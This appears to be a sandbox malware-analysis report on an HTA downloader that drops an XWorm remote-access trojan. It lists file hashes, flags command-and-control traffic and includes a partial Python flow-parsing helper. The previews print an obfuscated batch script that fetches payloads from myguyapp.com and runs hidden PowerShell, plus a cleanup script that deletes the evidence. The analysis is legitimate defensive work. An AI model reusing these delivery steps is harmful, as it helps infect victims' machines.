                                                                          Preview:SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:616-0500 ThreadID=1988 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=03eb45c0-6f15-4e02-8f47-7bcad9f98910.1734026837616 Timestamp=2024-12-12T13:07:17:635-0500 ThreadID=1988 Component=ngl-lib_NglAppLib Description="SetConf
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.405554483807884
                                                                          Encrypted:false
                                                                          SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbVcbSIljcbR:ceo4+rsCIlw
                                                                          MD5:FB8A14DD082A25B1F4DEFDC52B580E3F
                                                                          SHA1:105C5AD88284E01842CD12FC232EDA3547804E69
                                                                          SHA-256:0951CB9AAEB198EE9C5B59A53BEB402B867B2E6DC290E3E3ABB53B80051B2723
                                                                          SHA-512:EBDC2B5A63C2A332DF6F4F193F16924D78A392226CD25845EEB177D5C8A38203ADCEEB0C2C76BE010178559B3C7E70833B71674E3670A6D035E287F0318E8A0C
                                                                          Malicious:false
                                                                          Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                          MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                          SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                          SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                          SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                          MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                          SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                          SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                          SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                          Process:C:\Windows\SysWOW64\mshta.exe
                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):183
                                                                          Entropy (8bit):4.808485235762564
                                                                          Encrypted:false
                                                                          SSDEEP:3:mKDDCMN2RmDNv2lOCHyg4E2J5xAIhMS2LFM2H5+Vovu9LsB8SAlOCHyg4E2J5xAK:hWK2ON+cCHhJ23fhnKFM0qo29LiXCHh0
                                                                          MD5:FF63BD613DE8A2A8EAE0D47FC5BBD08A
                                                                          SHA1:99788C0FA5ECCB289F6E2321125400DC6CFB58B4
                                                                          SHA-256:0D572935FB9C96BC83715E6EDD0D7CAE25F2101667925B79D0A305E1ABD8D381
                                                                          SHA-512:02707A408A668D384DF149CDA2F91B7B363870B1FC2DD09ABB851037AA4EC3B657F78EFFE2F852477F20CBD7B90BB73C46292B441CB8280104AAFFA26E51DE93
                                                                          Malicious:false
                                                                          Preview:@echo off..timeout /t 90 >nul..del "C:\Users\user\AppData\Local\Temp\temp.bat"..del f.pdf..del msword.zip..del downloaded.hta..del "C:\Users\user\AppData\Local\Temp\cleanup.bat"..
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PDF document, version 1.4, 4 pages
                                                                          Category:dropped
                                                                          Size (bytes):276302
                                                                          Entropy (8bit):7.83317883790279
                                                                          Encrypted:false
                                                                          SSDEEP:6144:f7TySmt1MtVReLAaFQfz33NKy1zdp7Vum1S6rpn7p5Xc7:jGSFUAaFInNKy1Dn1fn7plc7
                                                                          MD5:950557F66ABA12BF2797E9FC134B3DAA
                                                                          SHA1:B882BB3263A69B482C9914A6E2ADA437512C06BD
                                                                          SHA-256:7EC84FF21725BFFDE7F1301C5C3C34810FB1F92D690DBDDE3716860891E0588F
                                                                          SHA-512:03213B75B8383196478F20D0031C8E075D11FED31B89671405E48596F477955688AE234AE44A757E7931E4D5DF7846C644583FA2C60AC670596D219A99C88B91
                                                                          Malicious:true
                                                                          Preview:%PDF-1.4..%......1 0 obj..<< .. /BitsPerComponent 1 .. /ColorSpace 3 0 R .. /Height 3288 .. /Subtype /Image .. /Type /XObject .. /Width 2560 .. /Filter [.. /CCITTFaxDecode ].. .. /DecodeParms [.. << .. /BlackIs1 true .. /Columns 2560 .. /K -1 .. /Rows 3288 .. >>.. ].. .. /Length 2 0 R .. >>..stream..&.>.....m.F.....A.....d.......'d....r.d...9..x8..*.A....m...9...# U.a.Hs.f..@.....$..Xk w....nENS`f@....`...W.9....q.(.L).....`..M%..A...l.."m^@...B.g6...P....4.q..N...)...(......r..Jr......qY.H.D.v.Dq...$X.........T..$.g.^dH.A.9..A......Lz..d.l..A.C[.........*e....E....L.... ...........<.P...$...8k......................&..}...?...............s5...~........._........_...........H...hLP.<..3"...4...."....#.5\.?...3......A...S..y+.BJD.. b!......x(]......T. A.< ._O_P.%.Z......"sK.5..G...!q.H.I'..E.D=..!....%t......g.#.;.H.gA.8........F.j.....:^...Y...H...P`.A.!....e.'.Ma.i.}8M{. ...D. .!..B. ..v.z.p.i='K.J...#.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):3802499
                                                                          Entropy (8bit):4.6033990571172305
                                                                          Encrypted:false
                                                                          SSDEEP:24576:cvQoCg23M7h2IqMNR4WbINxZAQlB+U0zUc:QQvg23M5R4WbI3LlAU0Uc
                                                                          MD5:AC1BB7433BD4A06FA226CFD057526675
                                                                          SHA1:A954C6F43448A85C209CA49408F02FF62A2EE08D
                                                                          SHA-256:CE5E1DBA0DFF8A00221D668D1E6B64419D57073F602CC12EEDFB8CCD46B403EB
                                                                          SHA-512:A0400A7A4C71C5725BF9295C7EB9F6E5C63C2ECA949F922C2A4C31C873EE72F595DBF70ED212CAE2B887E51B89D69F2446288227174A63F9A9429F1EBC888927
                                                                          Malicious:true
                                                                          Preview:PK..........\Y.F.%..:....5....msword.exe..|T.?~.G.l.E...4BP....(qA......f...*..@.9.h.&.....Zko.....[..J[+Q..@..Z........QW.a..............~...g.9..<...sf....#.M.$;.iJR.$.|...4...H....e-.....6eYm..+.Y}.}.w.b.J.........V....,.o....rJ.mL..[.f]..Lr.5uJ6......vL....<X0e0...b..Q.z.....) K.lK.....n.uIVK.%G.V....$.$.j.....'.VI..%[.W.....i....&.H.........Iz.2>..g..........<5HZ2X..........Du.:....'..h..sa.%i...K.T.......#.>...&.0i....V..F.....:qE..........V...yN..FZ..S......K....5.....X..;p.............uN.:........n#...YR...05..9M.a.l.......C..#x...O...G.H_.#EegL>&..C.Q..&%cdy=.F..[]/.B...q~.z....f..v..........r..s.\.......?.C.Q=..v.&.zNv..m.;xaL..D.).....r..@k.#.Y.802.|..3{Y.sm^a..~.<S]j..d..F-ThjU..:g..n....t.....Y....f^.,....eL..L.<..."=.........O...x....S(_...z..n.]bof......}.d.fu..U.p.[............X...4..mV.6+qIo.].l...jq.....r..z...`..5ZX.EUD.._.c..v...s.*42...._,.%(.q........@.g.....T..];.....4.;..r46.:.Wl....XneO.....hc{.|...z.,j
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):891289591
                                                                          Entropy (8bit):4.230074047814782
                                                                          Encrypted:false
                                                                          SSDEEP:
                                                                          MD5:C744E054E4EF01832BBF43B81D397B61
                                                                          SHA1:3360299F013BCD729FD1993280B9304605457238
                                                                          SHA-256:4EC9AD5867629EBDC9655123B138CBE63F7ED1EDFF2022B493DD075BD06C4E3D
                                                                          SHA-512:4DAC02819D1F0B2A56FD1131BDD6B64821B40A3403111DCF5EC58CB688778E8293BC1D41693AA3DC369B0A63A9967FF0CD641F0A2AD8B2678A9E1A0079A523FD
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n...2...B...8............@..................................(....@.................................4........@...o..............h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc....o...@...p..................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\SysWOW64\mshta.exe
                                                                          File Type:ASCII text, with very long lines (858), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):3432
                                                                          Entropy (8bit):5.234062070088092
                                                                          Encrypted:false
                                                                          SSDEEP:96:/TdUe5HQK36ughbWko0bb3qiek2GsMfTqjLgA784kzc:/1iC6/Hok3ck2m+gA4pc
                                                                          MD5:D549E854FB2AAB68C75932BCF3A665B4
                                                                          SHA1:8A6B197876F71629D0D9203D07ECCE9AF74ED23B
                                                                          SHA-256:1EC09B7E61FA833273AC18D88FAC6A4A170EB9162E9EB22CF792501A5ADB80FC
                                                                          SHA-512:09DC0CA4747C9889E91444D81F169F23F8D06F4E4CCA8100DB0D6EB2CD7C0CD8B8B1A43F02CB3D32AD41A0B3FAEAA5F8CD51AE2099C2B47FEF2DD56DB6C6F6C7
                                                                          Malicious:true
                                                                          Preview:@%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%..set url=https://myguyapp.com/msword.zip..s%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%vUI%/%K%m%MCJQ%y%wuBhlDQq%g%bvZ%u%uMfDTf%y%HvowO%a%g%p%gW%p%WuVdNidl%.%J%c%mQbubjWlWA%o%JHjbKI%m%SLrrGw%/%kgMFGJDia%m%iY%s%CyXf%w%AOQZxDh%o%JaMNppS%r%OFHHQzh%d%ogNI%.%CWIe%z%NvLL%i%nUqshO%p%ol%..set url2=https://myguyapp.com/f.pdf..s%lLMxI%e%E%t%HmFSG% %eShSGJ%u%ffAbYQ%r%jKPqgaqto%l%EMjcmqMfca%2%FoaxIpOlBa%=%tFP%h%QfOUPNjO%t%eJQcBi%t%T%p%E%s%cEBinqC%:%gpBCsoCKj%/%O%/%Sc%m%jxCVyoV%y%xupSDw%g%c%u%ZXfcFhQc%y%MTizciab%a%HajpQ%p%egxXS%p%GbeXqb%.%v%c%sOvJGeIi%o%iR%m%ghuPHIK%/%IyQ%f%Hy%.%jbNkg%p%wZavCJ%d%u%f%GZZx%..p%lq%o%rKw%w%rccL%e%MoQtMwm%r%KyfpjVP%s%UeGGJKVJuc%h%OLItsAkTl%e%SvXHsfY%l%xNn%l%qprygNiJ% %u%-%trOPn%W%riAGUqdCY%i%XJzeNiO%n%dADaL%d%vwEhbsFtTh%o%NVBUHaBrg%w%KgiWKgQqo%S%uUzQb%t%bckc%y%yQMRkxNH%l%RCyA%e%vwwwFI% %nLhuAftFS%H%SMhVFx%
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >), ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):99
                                                                          Entropy (8bit):4.883547380318454
                                                                          Encrypted:false
                                                                          SSDEEP:3:HRAbABGQaFyw3pYoCHyg4E2J5mJ17ufLOcsaYuPA/y:HRYF5yjoCHhJ23mf7YswIy
                                                                          MD5:5181215F817B44DA99B3B35E68C0A909
                                                                          SHA1:31E93314B55734C6F3DABCEC09A678C44C1A955A
                                                                          SHA-256:8958D88D33A80CCB9D4A60E44199AF593A314B2398115E6B44213F73B617CED9
                                                                          SHA-512:45E25CF7DBF290FBC6BCBDA8E90902FCBFC8DA000B5B03C49ECEBCE3E3A929BE33DBC270F37C8F2B6B66ED9722FC5EFF79F1D84549572EA7BC7061E7F337B884
                                                                          Malicious:true
                                                                          Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" ..
                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                          File Type:ASCII text, with very long lines (411), with CRLF line terminators, with overstriking
                                                                          Category:dropped
                                                                          Size (bytes):415
                                                                          Entropy (8bit):3.4014677996260176
                                                                          Encrypted:false
                                                                          SSDEEP:12:hYFTkv1ag7Y5PTgwQ6t6iQUAv/0U0DvsFyESnQBt1XtX:GFIdlQP8kW/0D0FVSnQb19X
                                                                          MD5:61E1CBA13946260690BB73DED66BDA6F
                                                                          SHA1:09BE31351D2EE985EB5D0676358A84BC5F89B8AC
                                                                          SHA-256:F0EB6C2E9F73CD4D7407D3E6B0ADADD4DCA1C23D725A5908208B4F7B748D8879
                                                                          SHA-512:BF4DA774430539C570CB86BE9C289C671CFD399B91AD79522BBB65099E7A90DCF5805B45B0A6D17C6A77E585099D74F9F9304CBA7F0D2A6EEB5D87FB47B96EF9
Malicious: false
Preview: ..Waiting for 90 seconds, press a key to continue .....89..88..87..86..85..84..83..82..81..80..79..78..77..76..75..74..73..72..71..70..69..68..67..66..65..64..63..62..61..60..59..58..57..56..55..54..53..52..51..50..49..48..47..46..45..44..43..42..41..40..39..38..37..36..35..34..33..32..31..30..29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..
File type: HTML document, ASCII text, with CRLF line terminators
Entropy (8bit): 4.547132968036531
TrID:
• HyperText Markup Language (12001/1) 40.67%
• HyperText Markup Language (11501/1) 38.98%
• HyperText Markup Language (6006/1) 20.35%
File name: c2.hta
File size: 3'462 bytes
MD5: 3b3967433fe77e5b709e469d9635d707
SHA1: 21dfe527565c8d9c766458a48634b2d633e59076
SHA256: bb4f26feac9120fd5104e555331bc9fbbab35a1b2874d61c241397dad73284a8
SHA512: b64c0b22f46f74fd2b698d93e667f8f5d6b02e766ec8ce4664a3af8bc1baedf5a8f71a1e0c46ffb34e167711982d4bda1c8426a13351300a387047f943136684
SSDEEP: 48:wOvfTntHcmhdT1hnLU5Lo1fWKGUTF50H3/CO:w+rnJhV1hL6/LeQH3
TLSH: 4261AC1FDEE39F628932CA6349ABA80DDD9CC90B15508489750CCC4A7F7537CA8D16FA
File Content Preview: <html>..<head>.. <title>BAT Downloader</title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes".. /
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T19:10:36.041153+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49728 | 193.26.115.21 | 7007 | TCP
2024-12-12T19:10:45.764994+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 193.26.115.21 | 7007 | 192.168.2.8 | 49728 | TCP
2024-12-12T19:10:45.764994+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 193.26.115.21 | 7007 | 192.168.2.8 | 49728 | TCP
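The TCP packet listing that follows is one row per packet, which makes it hard to see how many connections the sample actually opened to 193.26.115.21 and how long each lasted. The Python helper below is an added example, not code from the Joe Sandbox report: it groups packets into bidirectional flows keyed by the 4-tuple, takes the sender of the first packet seen for a 4-tuple as the side that opened the connection, and reports packet counts per direction plus the flow duration. The embedded rows are copied from the report's TCP packet listing (the whole first TLS session on client port 49708 and the first five packets of the second on 49710), with the columns delimited by " | "; the code assumes the listing is chronological and that all timestamps fall on one calendar day, which holds for this report.

```python
"""Collapse a per-packet TCP listing into per-connection flow records.

Added example for the c2.hta report, not part of Joe Sandbox. Sample rows below are
copied from the report (columns: Timestamp | Source Port | Dest Port | Source IP | Dest IP).
Assumptions: rows are chronological (so the first packet of a 4-tuple is the opener)
and fall on a single day (so seconds-of-day arithmetic gives the duration).
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

PACKET_ROWS = """\
Dec 12, 2024 19:07:08.655844927 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:08.655859947 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:08.655926943 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:08.666148901 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:08.666161060 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:09.951076031 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:09.951178074 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.137773991 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.137805939 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.138257027 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.138328075 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.143276930 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.187338114 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490355968 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490386963 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490423918 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.490441084 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490449905 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.490483999 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.490539074 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:10.490583897 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.492981911 CET | 49708 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:10.492994070 CET | 443 | 49708 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:11.429455042 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:11.429505110 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
Dec 12, 2024 19:07:11.429568052 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:11.436352015 CET | 49710 | 443 | 192.168.2.8 | 193.26.115.21
Dec 12, 2024 19:07:11.436366081 CET | 443 | 49710 | 193.26.115.21 | 192.168.2.8
"""

Endpoint = Tuple[str, int]            # (ip, port)
FlowKey = Tuple[str, int, str, int]   # (client_ip, client_port, server_ip, server_port)


@dataclass
class Flow:
    client: Endpoint
    server: Endpoint
    first_seen: str
    last_seen: str
    first_s: float
    last_s: float
    packets_out: int = 0  # client -> server
    packets_in: int = 0   # server -> client


def _seconds_of_day(ts: str) -> float:
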